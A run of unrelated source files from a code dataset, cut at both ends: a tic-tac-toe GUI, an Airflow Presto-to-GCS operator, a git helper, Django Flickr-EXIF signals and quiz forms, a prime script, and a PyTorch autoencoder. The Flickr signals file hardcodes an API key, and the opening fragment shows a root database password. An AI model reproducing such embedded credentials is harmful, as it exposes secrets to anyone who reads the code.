0\n#a=database_wardwindow(\"localhost\",\"root\",\"3zxc3\")\n#a.createFormTable(\"gshs\")\n#a.addColumns(\"gshs\",\"Ajh\",\"sdkjjhv\",\"hjgd\")\n#print(a.getRowCount('RegDate','marriageregistration',\"2076/01/%\"))\n\n","sub_path":"Smartward/forms/sifaris/dbconnect.py","file_name":"dbconnect.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"454466255","text":"import tkinter as tk\nimport Functions4 as fn\n\nclass Main(tk.Frame):\n\n\tN = 3\n\tPlayer = \"x\"\n\tIndent = 3\n\tHeader = None\n\tPCFirst = True\n\tGameOver = False\n\tGameField = []\n\tButtons = []\n\tActive = False\n\tInMenu = True\n\n\tBackgroundColor = \"#3c3b3d\"\n\tSeparatorColor = \"#252526\"\n\n\tX = \"×\"\n\tO = \"○\"\n\n\tdef __init__(self, root):\n\t\tsuper().__init__(root)\n\t\tself.menu()\n\n\n\tdef computer_turn(self):\n\t\troot.update()\n\t\tif not self.GameOver:\n\t\t\tself.Header.configure(text=\"Thinking...\")\n\t\t\tif self.PCFirst:\n\t\t\t\tplayerFirst = False\n\t\t\telse:\n\t\t\t\tplayerFirst = True\n\t\t\tif self.Player == \"x\":\n\t\t\t\tActualPlayer = \"X\"\n\t\t\telse:\n\t\t\t\tActualPlayer = \"O\"\n\t\t\txy = fn.JarvisManager(self.GameField, ActualPlayer)\n\t\t\tprint(xy, self.Player)\n\t\t\ti = xy[0]\n\t\t\tj = xy[1]\n\t\t\tif self.Player == \"x\":\n\t\t\t\tself.Buttons[i][j].configure(text=self.X)\n\t\t\t\tself.GameField[i][j] = \"X\"\n\t\t\telse:\n\t\t\t\tself.Buttons[i][j].configure(text=self.O, anchor=tk.S)\n\t\t\t\tself.GameField[i][j] = \"O\"\n\t\t\tself.Header.configure(text=\"Your Turn\")\n\n\n\n\n\tdef def_win(self, Buttons):\n\t\tif not self.GameOver:\n\t\t\twinner = fn.CheckForWin(Buttons, self.N)\n\t\t\tif winner == 1:\n\t\t\t\tif self.PCFirst:\n\t\t\t\t\tself.Header.configure(text=\"PC Wins!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\telse:\n\t\t\t\t\tself.Header.configure(text=\"You Win!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\tself.GameOver = True\n\t\t\telif winner == -1:\n\t\t\t\tif self.PCFirst:\n\t\t\t\t\tself.Header.configure(text=\"You Win!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\telse:\n\t\t\t\t\tself.Header.configure(text=\"PC Wins!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\tself.GameOver = True\n\t\tif fn.Is_full(self.GameField) and not self.GameOver:\n\t\t\tself.GameOver = True\n\t\t\tself.Header.configure(text=\"Dead Heat(\")\n\t\t\tself.restart_game()\n\t\t\treturn\n\n\n\n\tdef set_letter(self, Buttons, i, j):\n\t\tif not self.GameOver:\n\t\t\tif Buttons[i][j].cget(\"text\") == \" \" and self.Active:\n\t\t\t\tif self.Player == \"x\":\n\t\t\t\t\tButtons[i][j].configure(text=self.X)\n\t\t\t\t\tself.GameField[i][j] = \"X\"\n\t\t\t\t\tself.def_win(Buttons)\n\t\t\t\t\t\n\t\t\t\t\tself.Player = \"o\"\n\t\t\t\t\tself.Active = False\n\t\t\t\t\tself.computer_turn()\n\t\t\t\t\tself.Active = True\n\t\t\t\t\tself.Player = \"x\"\n\t\t\t\telif self.Player == \"o\":\n\t\t\t\t\tButtons[i][j].configure(text=self.O, anchor=tk.S)\n\t\t\t\t\tself.GameField[i][j] = \"O\"\n\t\t\t\t\tself.def_win(Buttons)\n\t\t\t\t\tself.Player = \"x\"\n\t\t\t\t\tself.Active = False\n\t\t\t\t\tself.computer_turn()\n\t\t\t\t\tself.Active = True\n\t\t\t\t\tself.Player = \"o\"\n\t\t\t\t\t\n\t\t\tself.def_win(Buttons)\n\n\n\tdef restart_game(self):\n\t\tself.Active = False\n\t\tRestartButton = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Restart\")\n\t\tRestartButton.place(x=75, y=250, width=200, height=50)\n\t\tdef Clear(event):\n\t\t\tif not self.InMenu:\n\t\t\t\tN = self.N\n\t\t\t\tt = 1\n\t\t\t\tfor i in range(N):\n\t\t\t\t\tfor j in range(N):\n\t\t\t\t\t\tself.GameField[i][j] = t\n\t\t\t\t\t\tself.Buttons[i][j].destroy()\n\t\t\t\tself.Player = \"x\"\n\t\t\t\tself.Header = None\n\t\t\t\tself.PCFirst = True\n\t\t\t\tself.GameOver = False\n\t\t\t\tself.GameField = []\n\t\t\t\tself.Buttons = []\n\t\t\t\tself.Active = False\n\t\t\t\tself.MainField.destroy()\n\t\t\t\tRestartButton.configure(bg=self.BackgroundColor, fg=self.BackgroundColor)\n\t\t\t\tself.InMenu = True\n\t\t\t\tself.menu()\n\t\t\t\n\t\tRestartButton.bind(\"\", Clear)\n\n\n\tdef menu(self):\n\t\tself.Header = tk.Label(root, bg=self.BackgroundColor, fg=self.SeparatorColor, font=(\"TkDefaultFont\", 30), text=\"Who is first?\")\n\t\tself.Header.place(x=0, y=0, width=350, height=120)\n\t\tCompF = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Computer\")\n\t\tUsrF = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Player\")\n\t\tCompF.place(x=75, y=180, width=200, height=50)\n\t\tUsrF.place(x=75, y=270, width=200, height=50)\n\t\tdef setC(event):\n\t\t\tself.PCFirst = True\n\t\t\tself.Active = False\n\t\t\tself.init_main()\n\t\tdef setU(event):\n\t\t\tself.PCFirst = False\n\t\t\tself.Active = True\n\t\t\tself.init_main()\n\t\tCompF.bind(\"\", setC)\n\t\tUsrF.bind(\"\", setU)\n\n\n\tdef init_main(self):\n\t\tself.InMenu = False\n\t\tN = self.N\n\t\tIndent = self.Indent\n\t\tButtonSize = int((330-Indent*(N-1))/N)\n\t\tself.Header.configure(font=(\"TkDefaultFont\", 40), text=\"Your Turn\")\n\n\t\tself.MainField = tk.Frame(bg=self.SeparatorColor)\n\t\tself.MainField.place(x=10, y=110, width=330, height=330)\n\n\t\tfor i in range(N):\n\t\t\tself.Buttons.append([])\n\t\t\tself.GameField.append([])\n\t\tt = 1\n\t\tfor i in range(N):\n\t\t\tfor j in range(N):\n\t\t\t\tself.GameField[i].append(t)\n\t\t\t\ttemp = tk.Label(self.MainField, bg=self.BackgroundColor, fg=self.SeparatorColor, font=(\"TkDefaultFont\", 76), text=\" \")\n\t\t\t\tself.Buttons[i].append(temp)\n\t\t\t\tX = ButtonSize*i + Indent*i\n\t\t\t\tY = ButtonSize*j + Indent*j\n\t\t\t\tself.Buttons[i][j].place(x=X, y=Y, width=ButtonSize, height=ButtonSize)\n\t\t\t\t#Buttons[i].bind(\"\", lambda x: self.set_letter(Buttons, i))\n\t\t\t\tt += 1\n\n\t\tself.Buttons[0][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 0))\n\t\tself.Buttons[0][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 1))\n\t\tself.Buttons[0][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 2))\n\t\tself.Buttons[1][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 0))\n\t\tself.Buttons[1][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 1))\n\t\tself.Buttons[1][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 2))\n\t\tself.Buttons[2][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 0))\n\t\tself.Buttons[2][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 1))\n\t\tself.Buttons[2][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 2))\n\n\t\tif self.PCFirst:\n\t\t\t#self.Player = \"o\"\n\t\t\tself.Header.configure(text=\"Thinking...\")\n\t\t\tself.computer_turn()\n\t\t\tself.Active = True\n\t\t\tself.Player = \"o\"\n\n\n\t\n\t\t\n\n\n\n\n\t\t\n\n\nroot = tk.Tk()\napp = Main(root)\napp.pack()\nroot.title(\"Крестики нолики\")\nroot.geometry(\"350x450+500+500\")\nroot.configure(background=app.BackgroundColor)\n\n\n\nroot.mainloop()","sub_path":"Python/Tkinter/TickTackToe/Game4.py","file_name":"Game4.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"56821128","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any\n\nfrom airflow.providers.google.cloud.transfers.sql_to_gcs import BaseSQLToGCSOperator\nfrom airflow.providers.presto.hooks.presto import PrestoHook\n\nif TYPE_CHECKING:\n from prestodb.client import PrestoResult\n from prestodb.dbapi import Cursor as PrestoCursor\n\n\nclass _PrestoToGCSPrestoCursorAdapter:\n \"\"\"\n An adapter that adds additional feature to the Presto cursor.\n\n The implementation of cursor in the prestodb library is not sufficient.\n The following changes have been made:\n\n * The poke mechanism for row. You can look at the next row without consuming it.\n * The description attribute is available before reading the first row. Thanks to the poke mechanism.\n * the iterator interface has been implemented.\n\n A detailed description of the class methods is available in\n `PEP-249 `__.\n \"\"\"\n\n def __init__(self, cursor: PrestoCursor):\n self.cursor: PrestoCursor = cursor\n self.rows: list[Any] = []\n self.initialized: bool = False\n\n @property\n def description(self) -> list[tuple]:\n \"\"\"\n This read-only attribute is a sequence of 7-item sequences.\n\n Each of these sequences contains information describing one result column:\n\n * ``name``\n * ``type_code``\n * ``display_size``\n * ``internal_size``\n * ``precision``\n * ``scale``\n * ``null_ok``\n\n The first two items (``name`` and ``type_code``) are mandatory, the other\n five are optional and are set to None if no meaningful values can be provided.\n \"\"\"\n if not self.initialized:\n # Peek for first row to load description.\n self.peekone()\n return self.cursor.description\n\n @property\n def rowcount(self) -> int:\n \"\"\"The read-only attribute specifies the number of rows.\"\"\"\n return self.cursor.rowcount\n\n def close(self) -> None:\n \"\"\"Close the cursor now.\"\"\"\n self.cursor.close()\n\n def execute(self, *args, **kwargs) -> PrestoResult:\n \"\"\"Prepare and execute a database operation (query or command).\"\"\"\n self.initialized = False\n self.rows = []\n return self.cursor.execute(*args, **kwargs)\n\n def executemany(self, *args, **kwargs):\n \"\"\"\n Prepare and execute a database operation.\n\n Prepare a database operation (query or command) and then execute it against\n all parameter sequences or mappings found in the sequence seq_of_parameters.\n \"\"\"\n self.initialized = False\n self.rows = []\n return self.cursor.executemany(*args, **kwargs)\n\n def peekone(self) -> Any:\n \"\"\"Return the next row without consuming it.\"\"\"\n self.initialized = True\n element = self.cursor.fetchone()\n self.rows.insert(0, element)\n return element\n\n def fetchone(self) -> Any:\n \"\"\"Fetch the next row of a query result set, returning a single sequence, or ``None``.\"\"\"\n if self.rows:\n return self.rows.pop(0)\n return self.cursor.fetchone()\n\n def fetchmany(self, size=None) -> list:\n \"\"\"\n Fetch the next set of rows of a query result, returning a sequence of sequences.\n\n An empty sequence is returned when no more rows are available.\n \"\"\"\n if size is None:\n size = self.cursor.arraysize\n\n result = []\n for _ in range(size):\n row = self.fetchone()\n if row is None:\n break\n result.append(row)\n\n return result\n\n def __next__(self) -> Any:\n \"\"\"\n Return the next row from the current SQL statement using the same semantics as ``.fetchone()``.\n\n A ``StopIteration`` exception is raised when the result set is exhausted.\n \"\"\"\n result = self.fetchone()\n if result is None:\n raise StopIteration()\n return result\n\n def __iter__(self) -> _PrestoToGCSPrestoCursorAdapter:\n \"\"\"Return self to make cursors compatible to the iteration protocol.\"\"\"\n return self\n\n\nclass PrestoToGCSOperator(BaseSQLToGCSOperator):\n \"\"\"Copy data from PrestoDB to Google Cloud Storage in JSON, CSV or Parquet format.\n\n :param presto_conn_id: Reference to a specific Presto hook.\n \"\"\"\n\n ui_color = \"#a0e08c\"\n\n type_map = {\n \"BOOLEAN\": \"BOOL\",\n \"TINYINT\": \"INT64\",\n \"SMALLINT\": \"INT64\",\n \"INTEGER\": \"INT64\",\n \"BIGINT\": \"INT64\",\n \"REAL\": \"FLOAT64\",\n \"DOUBLE\": \"FLOAT64\",\n \"DECIMAL\": \"NUMERIC\",\n \"VARCHAR\": \"STRING\",\n \"CHAR\": \"STRING\",\n \"VARBINARY\": \"BYTES\",\n \"JSON\": \"STRING\",\n \"DATE\": \"DATE\",\n \"TIME\": \"TIME\",\n # BigQuery don't time with timezone native.\n \"TIME WITH TIME ZONE\": \"STRING\",\n \"TIMESTAMP\": \"TIMESTAMP\",\n # BigQuery supports a narrow range of time zones during import.\n # You should use TIMESTAMP function, if you want have TIMESTAMP type\n \"TIMESTAMP WITH TIME ZONE\": \"STRING\",\n \"IPADDRESS\": \"STRING\",\n \"UUID\": \"STRING\",\n }\n\n def __init__(self, *, presto_conn_id: str = \"presto_default\", **kwargs):\n super().__init__(**kwargs)\n self.presto_conn_id = presto_conn_id\n\n def query(self):\n \"\"\"Queries presto and returns a cursor to the results.\"\"\"\n presto = PrestoHook(presto_conn_id=self.presto_conn_id)\n conn = presto.get_conn()\n cursor = conn.cursor()\n self.log.info(\"Executing: %s\", self.sql)\n cursor.execute(self.sql)\n return _PrestoToGCSPrestoCursorAdapter(cursor)\n\n def field_to_bigquery(self, field) -> dict[str, str]:\n \"\"\"Convert presto field type to BigQuery field type.\"\"\"\n clear_field_type = field[1].upper()\n # remove type argument e.g. DECIMAL(2, 10) => DECIMAL\n clear_field_type, _, _ = clear_field_type.partition(\"(\")\n new_field_type = self.type_map.get(clear_field_type, \"STRING\")\n\n return {\"name\": field[0], \"type\": new_field_type}\n\n def convert_type(self, value, schema_type, **kwargs):\n \"\"\"\n Do nothing. Presto uses JSON on the transport layer, so types are simple.\n\n :param value: Presto column value\n :param schema_type: BigQuery data type\n \"\"\"\n return value\n","sub_path":"airflow/providers/google/cloud/transfers/presto_to_gcs.py","file_name":"presto_to_gcs.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"498890623","text":"\n# Copyright Jamie Allsop 2014-2015\n# Distributed under the Boost Software License, Version 1.0.\n# (See accompanying file LICENSE_1_0.txt or copy at\n# http://www.boost.org/LICENSE_1_0.txt)\n\n#-------------------------------------------------------------------------------\n# Git Source Control Management System\n#-------------------------------------------------------------------------------\n\nimport subprocess\nimport shlex\nimport os\nfrom exceptions import Exception\n\n\nclass GitException(Exception):\n def __init__(self, value):\n self.parameter = value\n def __str__(self):\n return repr(self.parameter)\n\n\ndef info( path ):\n if not path:\n raise GitException(\"No working copy path specified for calling git commands with.\")\n\n url = None\n repository = None\n branch = None\n revision = None\n\n if not os.path.exists( os.path.join( path, \".git\" ) ):\n raise GitException(\"Not a Git working copy\")\n\n try:\n command = \"git describe --always\"\n revision = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path ).strip()\n\n command = \"git symbolic-ref HEAD\"\n branch = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path )\n branch = branch.replace( \"refs/heads/\", \"\" ).strip()\n\n command = \"git config --get remote.origin.url\"\n repository = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path ).strip()\n url = repository\n\n except subprocess.CalledProcessError:\n raise GitException(\"Not a Git working copy\")\n\n return url, repository, branch, revision\n\n","sub_path":"cuppa/scms/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"185581054","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom .models import Picture, Make, Lens, Camera\nimport requests\n\nFLICKR_API_URL = 'https://api.flickr.com/services/rest/'\nFLICKR_DISPLAY_PHOTO_URL = 'https://farm{}.staticflickr.com/{}/{}_{}_k.jpg'\n\ndef get_exif_data(picture_id):\n data = {}\n params = {\n 'format': 'json',\n 'nojsoncallback': 1,\n 'photo_id': picture_id,\n 'api_key': 'f665c808bb573b05caf029298373ec9e'\n }\n\n # EXIF\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getExif'}}).json()\n response = response['photo']['exif']\n tags = ['ISO', 'FocalLengthIn35mmFormat', 'FNumber', 'ExposureTime', 'Make', 'Lens', 'Model']\n for tag in tags:\n try:\n data[tag] = [x for x in response if x['tag'] == tag][0]['raw']['_content']\n except:\n data[tag] = None\n # Photo data\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getInfo'}}).json()\n\n response = response['photo']\n data['name'] = response['title']['_content']\n data['url'] = response['urls']['url'][0]['_content']\n # Display sizes\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getSizes'}}).json()\n data['display-url'] = response['sizes']['size'][-2]['source']\n return data\n\n\ndef update_picture_exif(picture):\n data = get_exif_data(picture.flickr_id)\n picture.display_url = data['display-url']\n if False:\n picture.url = data['url']\n picture.aperture = float(data['FNumber']) if data['FNumber'] is not None else None\n picture.focal_length = int(float(data['FocalLengthIn35mmFormat'].split(' ')[0])) if data['FocalLengthIn35mmFormat'] is not None else None\n picture.shutter_speed = data['ExposureTime']\n picture.iso = int(data['ISO']) if data['ISO'] is not None else None\n picture.name = data['name']\n\n if data['Make'] is not None:\n make = data['Make'].lower()\n make = make[0].upper()+make[1:]\n make_already_exist = Make.objects.filter(name=make).exists()\n if not make_already_exist:\n Make.objects.create(name=make)\n make = Make.objects.filter(name=make).first()\n\n if data['Lens'] is not None and picture.lens is None:\n if not Lens.objects.filter(model=data['Lens'], make=make).exists():\n lens = Lens.objects.create(model=data['Lens'], make=make)\n else:\n lens = Lens.objects.filter(model=data['Lens'], make=make).first()\n picture.lens = lens\n\n if data['Model'] is not None and picture.camera is None:\n if not Camera.objects.filter(model=data['Model'], make=make).exists():\n camera = Camera.objects.create(model=data['Model'], make=make)\n else:\n camera = Camera.objects.filter(model=data['Model'], make=make).first()\n picture.camera = camera\n\n post_save.disconnect(save_picture, sender=Picture)\n picture.save()\n post_save.connect(save_picture, sender=Picture)\n\n\n@receiver(post_save, sender=Picture)\ndef create_picture(sender, instance, created, **kwargs):\n if created:\n update_picture_exif(instance)\n\n\n@receiver(post_save, sender=Picture)\ndef save_picture(sender, instance, **kwargs):\n #update_picture_exif(instance)\n pass\n\n\ndef init_signals():\n pass\n","sub_path":"gallery/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"649378598","text":"count = 1;\r\nnum = 1;\r\nprime = 0;\r\nwhile(count < 10001):\r\n\tnum = num + 2;\r\n\tp = True;\r\n\tfor i in range(2, num):\r\n\t\tif(num % i == 0):\r\n\t\t\tp = False;\r\n\t\t\tbreak;\r\n\tif(p == True):\r\n\t\tprime = num;\r\n\t\tcount = count + 1;\r\n\t\tprint(count);\r\nprint(prime);\r\n","sub_path":"10001st prime.py","file_name":"10001st prime.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"460137075","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\nfrom django.forms.widgets import RadioSelect\n\nfrom .models import MCQQuestion, Answer, Quiz\n\n\nclass QuestionForm(forms.Form):\n def __init__(self, question, *args, **kwargs):\n super(QuestionForm, self).__init__(*args, **kwargs)\n choice_list = [x for x in question.get_answers_list()]\n self.fields[\"answers\"] = forms.ChoiceField(choices=choice_list, widget=RadioSelect)\n\n\nMCQFormSet = inlineformset_factory(MCQQuestion,\n Answer,\n fields=['content',\n 'correct'],\n extra=4,\n can_delete=True,\n )\n\n\nclass QuizCreateForm(forms.ModelForm):\n class Meta:\n model = Quiz\n exclude = ['course', 'slug', 'random_order', 'answers_at_end']\n\n\nclass MCQCreateForm(forms.ModelForm):\n class Meta:\n model = MCQQuestion\n exclude = ['course', 'quiz', 'answer_order']\n\n# class AnswerForm(forms.ModelForm):\n# class Meta:\n# model = Answer\n# exclude = ['question']\n#\n","sub_path":"aonebrains_quiz/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"141528946","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: VictorGueorguiev\n\"\"\"\n\n# code inspired by the following tutorial: \n#https://uvadlc-notebooks.readthedocs.io/en/latest/tutorial_notebooks/tutorial9/AE_CIFAR10.html#Building-the-autoencoder\n\n## Standard libraries\nimport os\nimport json\nimport math\nimport numpy as np\n\n## Imports for plotting\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import to_rgb\nimport matplotlib\nmatplotlib.rcParams['lines.linewidth'] = 2.0\nimport seaborn as sns\nsns.reset_orig()\nsns.set()\n\n## Progress bar\nfrom tqdm.notebook import tqdm\n\n## PyTorch\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nimport torch.optim as optim\n# Torchvision\nimport torchvision\nfrom torchvision.datasets import CIFAR10\nfrom torchvision import transforms\n# PyTorch Lightning\nimport pytorch_lightning as pl\n\nfrom pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint\n\n# Tensorboard extension (for visualization purposes later)\nfrom torch.utils.tensorboard import SummaryWriter\n\nclass Encoder(nn.Module):\n\n def __init__(self,\n num_input_channels : int,\n base_channel_size : int,\n latent_dim : int,\n act_fn : object = nn.GELU):\n \"\"\"\n Inputs:\n - num_input_channels : Number of input channels of the image. For CIFAR, this parameter is 3\n - base_channel_size : Number of channels we use in the first convolutional layers. Deeper layers might use a duplicate of it.\n - latent_dim : Dimensionality of latent representation z\n - act_fn : Activation function used throughout the encoder network\n \"\"\"\n super().__init__()\n c_hid = base_channel_size\n self.net = nn.Sequential(\n nn.Conv2d(num_input_channels, c_hid, kernel_size=3, padding=1, stride=2), # 32x32 => 16x16\n act_fn(),\n nn.Conv2d(c_hid, c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.Conv2d(c_hid, 2*c_hid, kernel_size=3, padding=1, stride=2), # 16x16 => 8x8\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1, stride=2), # 8x8 => 4x4\n act_fn(),\n nn.Flatten(), # Image grid to single feature vector\n nn.Linear(2*16*c_hid, latent_dim)\n )\n\n def forward(self, x):\n return self.net(x)\n\nclass Decoder(nn.Module):\n\n def __init__(self,\n num_input_channels : int,\n base_channel_size : int,\n latent_dim : int,\n act_fn : object = nn.GELU):\n \"\"\"\n Inputs:\n - num_input_channels : Number of channels of the image to reconstruct. For CIFAR, this parameter is 3\n - base_channel_size : Number of channels we use in the last convolutional layers. Early layers might use a duplicate of it.\n - latent_dim : Dimensionality of latent representation z\n - act_fn : Activation function used throughout the decoder network\n \"\"\"\n super().__init__()\n c_hid = base_channel_size\n self.linear = nn.Sequential(\n nn.Linear(latent_dim, 2*16*c_hid),\n act_fn()\n )\n self.net = nn.Sequential(\n nn.ConvTranspose2d(2*c_hid, 2*c_hid, kernel_size=3, output_padding=1, padding=1, stride=2), # 4x4 => 8x8\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.ConvTranspose2d(2*c_hid, c_hid, kernel_size=3, output_padding=1, padding=1, stride=2), # 8x8 => 16x16\n act_fn(),\n nn.Conv2d(c_hid, c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.ConvTranspose2d(c_hid, num_input_channels, kernel_size=3, output_padding=1, padding=1, stride=2), # 16x16 => 32x32\n nn.Tanh() # The input images is scaled between -1 and 1, hence the output has to be bounded as well\n )\n\n def forward(self, x):\n x = self.linear(x)\n x = x.reshape(x.shape[0], -1, 4, 4)\n x = self.net(x)\n return x\n \nclass Autoencoder(pl.LightningModule):\n\n def __init__(self,\n base_channel_size: int,\n latent_dim: int,\n encoder_class : object = Encoder,\n decoder_class : object = Decoder,\n num_input_channels: int = 3,\n width: int = 32,\n height: int = 32):\n super().__init__()\n # Saving hyperparameters of autoencoder\n self.save_hyperparameters()\n # Creating encoder and decoder\n self.encoder = encoder_class(num_input_channels, base_channel_size, latent_dim)\n self.decoder = decoder_class(num_input_channels, base_channel_size, latent_dim)\n # Example input array needed for visualizing the graph of the network\n self.example_input_array = torch.zeros(2, num_input_channels, width, height)\n\n def forward(self, x):\n \"\"\"\n The forward function takes in an image and returns the reconstructed image\n \"\"\"\n z = self.encoder(x)\n x_hat = self.decoder(z)\n return x_hat\n\n def _get_reconstruction_loss(self, batch):\n \"\"\"\n Given a batch of images, this function returns the reconstruction loss (MSE in our case)\n \"\"\"\n x, _ = batch # We do not need the labels\n x_hat = self.forward(x)\n loss = F.mse_loss(x, x_hat, reduction=\"none\")\n loss = loss.sum(dim=[1,2,3]).mean(dim=[0])\n return loss\n\n def configure_optimizers(self):\n optimizer = optim.Adam(self.parameters(), lr=1e-3)\n # Using a scheduler is optional but can be helpful.\n # The scheduler reduces the LR if the validation performance hasn't improved for the last N epochs\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n mode='min',\n factor=0.2,\n patience=20,\n min_lr=5e-5)\n return {\"optimizer\": optimizer, \"lr_scheduler\": scheduler, \"monitor\": \"val_loss\"}\n\n def training_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('val_loss', loss)\n\n def test_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('test_loss', loss)\n\nclass GenerateCallback(pl.Callback):\n\n def __init__(self, input_imgs, every_n_epochs=1):\n super().__init__()\n self.input_imgs = input_imgs # Images to reconstruct during training\n self.every_n_epochs = every_n_epochs # Only save those images every N epochs (otherwise tensorboard gets quite large)\n\n def on_epoch_end(self, trainer, pl_module):\n if trainer.current_epoch % self.every_n_epochs == 0:\n # Reconstruct images\n input_imgs = self.input_imgs.to(pl_module.device)\n with torch.no_grad():\n pl_module.eval()\n reconst_imgs = pl_module(input_imgs)\n pl_module.train()\n # Plot and add to tensorboard\n imgs = torch.stack([input_imgs, reconst_imgs], dim=1).flatten(0,1)\n grid = torchvision.utils.make_grid(imgs, nrow=2, normalize=True, range=(-1,1))\n trainer.logger.experiment.add_image(\"Reconstructions\", grid, global_step=trainer.global_step)\n\ndef compare_imgs(img1, img2, title_prefix=\"\"):\n # Calculate MSE loss between both images\n loss = F.mse_loss(img1, img2, reduction=\"sum\")\n # Plot images for visual comparison\n grid = torchvision.utils.make_grid(torch.stack([img1, img2], dim=0), nrow=2, normalize=True, range=(-1,1))\n grid = grid.permute(1, 2, 0)\n plt.figure(figsize=(4,2))\n plt.title(\"%s Loss: %4.2f\" % (title_prefix, loss.item()))\n plt.imshow(grid)\n plt.axis('off')\n plt.show()\n \ndef visualize_reconstructions(model, input_imgs):\n # Reconstruct images\n model.eval()\n with torch.no_grad():\n reconst_imgs = model(input_imgs.to(model.device))\n reconst_imgs = reconst_imgs.cpu()\n\n # Plotting\n imgs = torch.stack([input_imgs, reconst_imgs], dim=1).flatten(0,1)\n grid = torchvision.utils.make_grid(imgs, nrow=4, normalize=True, range=(-1,1))\n grid = grid.permute(1, 2, 0)\n plt.figure(figsize=(7,4.5))\n plt.title(\"Reconstructed from %i latents\" % (model.hparams.latent_dim))\n plt.imshow(grid)\n plt.axis('off')\n plt.show()\n \ndef train_cifar(latent_dim):\n # Create a PyTorch Lightning trainer with the generation callback\n trainer = pl.Trainer(default_root_dir=os.path.join(CHECKPOINT_PATH, \"cifar10_%i\" % latent_dim),\n gpus=1 if str(device).startswith(\"cuda\") else 0,\n max_epochs=500,\n callbacks=[ModelCheckpoint(save_weights_only=True),\n GenerateCallback(get_train_images(8), every_n_epochs=10),\n LearningRateMonitor(\"epoch\")])\n trainer.logger._log_graph = True # If True, we plot the computation graph in tensorboard\n trainer.logger._default_hp_metric = None # Optional logging argument that we don't need\n\n # Check whether pretrained model exists. If yes, load it and skip training\n pretrained_filename = os.path.join(CHECKPOINT_PATH, \"cifar10_%i.ckpt\" % latent_dim)\n if os.path.isfile(pretrained_filename):\n print(\"Found pretrained model, loading...\")\n model = Autoencoder.load_from_checkpoint(pretrained_filename)\n else:\n model = Autoencoder(base_channel_size=32, latent_dim=latent_dim)\n trainer.fit(model, train_loader, val_loader)\n # Test best model on validation and test set\n val_result = trainer.test(model, test_dataloaders=val_loader, verbose=False)\n test_result = trainer.test(model, test_dataloaders=test_loader, verbose=False)\n result = {\"test\": test_result, \"val\": val_result}\n return model, result\n\n# Path to the folder where the datasets are/should be downloaded (e.g. CIFAR10)\nDATASET_PATH = \"../data\"\n# Path to the folder where the pretrained models are 